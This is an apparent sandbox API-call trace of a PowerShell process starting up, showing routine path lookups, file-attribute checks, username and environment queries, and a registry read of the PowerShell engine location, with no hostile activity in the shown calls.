	[0685.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.712] CoTaskMemFree (pv=0x2f95e0) 
	[0687.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.482] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0687.482] SetErrorMode (uMode=0x1) returned 0x1
	[0687.483] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0687.483] SetErrorMode (uMode=0x1) returned 0x1
	[0687.483] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0687.483] SetErrorMode (uMode=0x1) returned 0x1
	[0687.483] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0687.483] SetErrorMode (uMode=0x1) returned 0x1
	[0687.483] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0687.483] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0687.484] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.484] SetErrorMode (uMode=0x1) returned 0x1
	[0687.484] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0687.484] SetErrorMode (uMode=0x1) returned 0x1
	[0687.484] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.484] SetErrorMode (uMode=0x1) returned 0x1
	[0687.484] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0687.484] SetErrorMode (uMode=0x1) returned 0x1
	[0687.484] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.485] SetErrorMode (uMode=0x1) returned 0x1
	[0687.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.485] SetErrorMode (uMode=0x1) returned 0x1
	[0687.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.485] SetErrorMode (uMode=0x1) returned 0x1
	[0687.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.485] SetErrorMode (uMode=0x1) returned 0x1
	[0687.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.486] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.486] SetErrorMode (uMode=0x1) returned 0x1
	[0687.486] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0687.486] SetErrorMode (uMode=0x1) returned 0x1
	[0687.486] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.487] SetErrorMode (uMode=0x1) returned 0x1
	[0687.487] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0687.487] SetErrorMode (uMode=0x1) returned 0x1
	[0687.487] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0687.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.487] SetErrorMode (uMode=0x1) returned 0x1
	[0687.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.488] SetErrorMode (uMode=0x1) returned 0x1
	[0687.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.488] SetErrorMode (uMode=0x1) returned 0x1
	[0687.488] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.488] SetErrorMode (uMode=0x1) returned 0x1
	[0687.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0687.491] SetErrorMode (uMode=0x1) returned 0x1
	[0687.491] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d6d0 | out: lpFileInformation=0x16d6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0687.491] SetErrorMode (uMode=0x1) returned 0x1
	[0687.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.322] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0691.322] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16da38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16da38) returned 0x1
	[0691.322] CoTaskMemFree (pv=0x1b8eaee0) 
	[0691.322] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0691.323] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16da78 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16da78) returned 1
	[0691.324] CoTaskMemFree (pv=0x293a20) 
	[0691.326] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1db88*="Available", lpRawData=0x2f1d918) returned 1
	[0691.329] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0691.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.329] CoTaskMemFree (pv=0x2f95e0) 
	[0691.331] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0691.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.331] CoTaskMemFree (pv=0x2f95e0) 
	[0691.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.338] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0691.338] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0691.338] CoTaskMemFree (pv=0x2f95e0) 
	[0691.338] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0691.338] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0691.338] CoTaskMemFree (pv=0x2f95e0) 
	[0691.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.343] GetCurrentProcessId () returned 0x12e0
	[0691.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.348] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da58 | out: phkResult=0x16da58*=0x384) returned 0x0
	[0691.348] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9dc, lpData=0x0, lpcbData=0x16d9d8*=0x0 | out: lpType=0x16d9dc*=0x1, lpData=0x0, lpcbData=0x16d9d8*=0x56) returned 0x0
	[0691.348] CoTaskMemAlloc (cb=0x5a) returned 0x1b8caed0
	[0691.348] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9ac, lpData=0x1b8caed0, lpcbData=0x16d9a8*=0x56 | out: lpType=0x16d9ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d9a8*=0x56) returned 0x0
	[0691.348] CoTaskMemFree (pv=0x1b8caed0) 
	[0691.349] RegCloseKey (hKey=0x384) returned 0x0
